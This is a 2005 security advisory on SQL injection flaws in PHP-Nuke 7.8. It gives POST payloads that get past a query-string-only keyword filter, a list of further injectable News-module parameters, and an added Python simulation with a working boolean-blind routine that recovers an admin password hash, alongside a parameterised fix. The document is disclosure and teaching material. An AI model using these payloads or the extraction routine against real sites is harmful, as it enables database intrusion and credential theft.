[NewAngels Advisory #7] PHP Nuke <= 7.8 Multiple SQL Injections
=============================================================================
Software: PHP Nuke 7.8
Type: SQL Injections
Risk: High
Date: Sep. 10 2005
Vendor: PHP-Nuke (phpnuke.org)
Credit:
=======
Robin 'onkel_fisch' Verton from it-security23.net
Description:
============
PHP-Nuke is an automated news system designed for use on intranets and the Internet.
The administrator has total control of the web site and its registered users, and has at hand
a powerful set of tools for maintaining an active, fully interactive, database-driven web site.
[http://www.phpnuke.org/]
Vulnerability:
==============
PHP Nuke 7.8 is prone to multiple SQL injection vulnerabilities.
These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
In modules.php:
$result = $db->sql_query("SELECT active, view FROM ".$prefix."_modules WHERE title='$name'");
The $name variable is not checked, so malicious SQL code can be injected into it. An included file contains the following filter:
$queryString = strtolower($_SERVER['QUERY_STRING']);
if (stripos_clone($queryString,'%20union%20') OR stripos_clone($queryString,'/*') OR stripos_clone($queryString,'*/union/*') OR stripos_clone($queryString,'c2nyaxb0')) {
header("Location: index.php");
die();
}
[...]
if (!ini_get("register_globals")) {
import_request_variables('GPC');
}
So UNION (and '/*') cannot be used in a GET variable. But because the application relies on register_globals or import_request_variables(),
the same variable can be sent via POST, and the POST body is never checked: the filter only inspects $_SERVER['QUERY_STRING'].
The two requests below are handled differently:
http://www.example.com/modules.php POST: name=' OR 1=1/*
http://www.example.com/modules.php POST: name=' OR 1=2/*
The second one only tells you that the requested 'module' is not active. Because the responses to a true and a false condition differ, the admin password hash can be read out via blind (boolean-based) injection.
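To make the filter bypass and the blind extraction concrete, here is an added Python simulation. It is not PHP-Nuke's code and was not part of the original advisory: the quoted QUERY_STRING filter and the unparameterised modules.php query are re-implemented against an in-memory SQLite database (standing in for MySQL), the nuke_authors(aid, pwd) table is an assumption modelled on PHP-Nuke's authors table, and the admin password is a constructed value. A parameterised variant is included alongside as the hardened form.

```python
import hashlib
import sqlite3
import urllib.parse

# Constructed stand-in data: one active module and one admin account. The
# table/column names follow PHP-Nuke's "nuke_" schema (nuke_modules with
# title/active/view as in the quoted query; nuke_authors with aid/pwd is an
# assumption about the authors table). The password is made up for the demo.
DEMO_ADMIN_PASSWORD = "example"


def admin_hash():
    """MD5 of the constructed admin password, stored the way PHP-Nuke stores it."""
    return hashlib.md5(DEMO_ADMIN_PASSWORD.encode()).hexdigest()


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE nuke_modules (title TEXT, active INTEGER, view INTEGER);
        INSERT INTO nuke_modules VALUES ('News', 1, 0);
        CREATE TABLE nuke_authors (aid TEXT, pwd TEXT);
    """)
    db.execute("INSERT INTO nuke_authors VALUES ('admin', ?)", (admin_hash(),))
    return db


def filtered(query_string):
    """Mirror of the QUERY_STRING check quoted above: lowercase the raw query
    string and look for a few tokens. The POST body is never examined."""
    qs = query_string.lower()
    return any(tok in qs for tok in ("%20union%20", "/*", "*/union/*", "c2nyaxb0"))


def modules_php(db, query_string="", post=None):
    """Simulation of the vulnerable modules.php: run the filter, merge GET and
    POST the way import_request_variables('GPC') does (POST overwrites GET),
    then build the query by string concatenation, as in the advisory."""
    if filtered(query_string):
        return "redirect"                       # header("Location: index.php"); die();
    params = dict(urllib.parse.parse_qsl(query_string))
    params.update(post or {})
    name = params.get("name", "")
    sql = "SELECT active, view FROM nuke_modules WHERE title='%s'" % name
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "error"                          # a failed query shows up as an error page
    if row and row[0] == 1:
        return "module"                         # the module is rendered
    return "not active"                         # "module is not active" message


def modules_php_fixed(db, query_string="", post=None):
    """Hardened form (added here, not PHP-Nuke's own fix): bind $name as a
    query parameter so injected text is compared literally against title."""
    params = dict(urllib.parse.parse_qsl(query_string))
    params.update(post or {})
    row = db.execute("SELECT active, view FROM nuke_modules WHERE title=?",
                     (params.get("name", ""),)).fetchone()
    return "module" if row and row[0] == 1 else "not active"


def blind_read_admin_hash(db):
    """Boolean-blind extraction through the unchecked POST channel: a guess that
    makes the OR condition true returns the module page, a wrong guess returns
    'not active'. 32 positions x 16 hex digits = at most 512 requests."""
    recovered = ""
    for pos in range(1, 33):
        for c in "0123456789abcdef":
            payload = ("' OR (SELECT substr(pwd,%d,1) FROM nuke_authors "
                       "WHERE aid='admin')='%s'/*" % (pos, c))
            if modules_php(db, "", {"name": payload}) == "module":
                recovered += c
                break
        else:
            raise RuntimeError("no hex digit matched at position %d" % pos)
    return recovered


if __name__ == "__main__":
    db = build_db()
    # Same payload: blocked in the query string, accepted in the POST body.
    print("GET  ' OR 1=1/* ->", modules_php(db, "name='%20OR%201=1/*"))
    print("POST ' OR 1=1/* ->", modules_php(db, "", {"name": "' OR 1=1/*"}))
    print("POST ' OR 1=2/* ->", modules_php(db, "", {"name": "' OR 1=2/*"}))
    print("blind-read hash  ->", blind_read_admin_hash(db))
    print("fixed, POST      ->", modules_php_fixed(db, "", {"name": "' OR 1=1/*"}))
```

The point the simulation makes is that the keyword filter and the injection live on different channels: the filter sees only the query string, while register_globals / import_request_variables() happily populate $name from the POST body. Blocking a few tokens therefore does not protect the query; binding the value as a parameter does, regardless of where the request variable came from.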
Additionally, there are a few SQL injections in the modules.
Here are a few examples:
http://www.example.com/modules.php?name=News&file=article&sid=[SQL] - same as above: send this via POST to bypass the 'union' filter
http://www.example.com/modules.php?name=News&file=comments&Reply&pid=[SQL]
http://www.example.com/modules.php?name=News&file=comments&op=Reply&pid=[SQL]
http://www.example.com/modules.php?name=News&file=comments&op=Reply&sid=[SQL]
Greets:
==============
CyberDead, atomic, sirius_
Whole secured-pussy.de Team
Zealots :D :D